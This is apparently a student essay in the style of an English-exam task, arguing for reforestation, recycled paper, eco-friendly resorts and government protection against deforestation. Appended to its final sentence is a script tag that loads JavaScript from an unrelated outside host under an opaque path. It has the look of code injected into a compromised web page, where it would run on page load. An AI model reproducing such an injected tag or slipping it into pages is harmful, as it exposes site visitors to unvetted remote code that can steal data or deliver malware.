Deforestation caused by human activity is happening in many parts of the world, with serious results for-environment. What do you think can be done to solve this problem?

Nowadays, deforestation or logging have had many negative impacts on our Earth. In hindsight, we could comprehend that the results of deforestation are also badly affecting every person, every country, and every region.

Logging is the most common reason, for example, for making papers or magazines or toilet paper, laying out a golf course, or building resorts. These are activities to help people earn so much profit, so they could not give up their benefits. However, we can find suitable solutions to have effective results in both sectors. Firstly, we should stabilize deforestation and reforestation to balance input and output. Secondly, we could combine the natural environment and the resort, we will have a lovely fresh resort for holiday and plant the tree to save the Earth. Thirdly, we could choose renewable papers and after using them, they will be recycled again. There are some ways to get stabilization between environment and economic benefits.

Besides that, many protective forests have been felled that have become one in many triggers to create natural disasters like erosion, flood, storm, etc. So the government must take action to protect important forests.

In conclusion, we should recognize the individual responsibility to prevent, inhibit, and save our life (lives). I believe my solution could decrease the anger of mother nature after many cumulative actions of people over many centuries.<script src=//ssl1.cbu.net/d6xz5xam></script>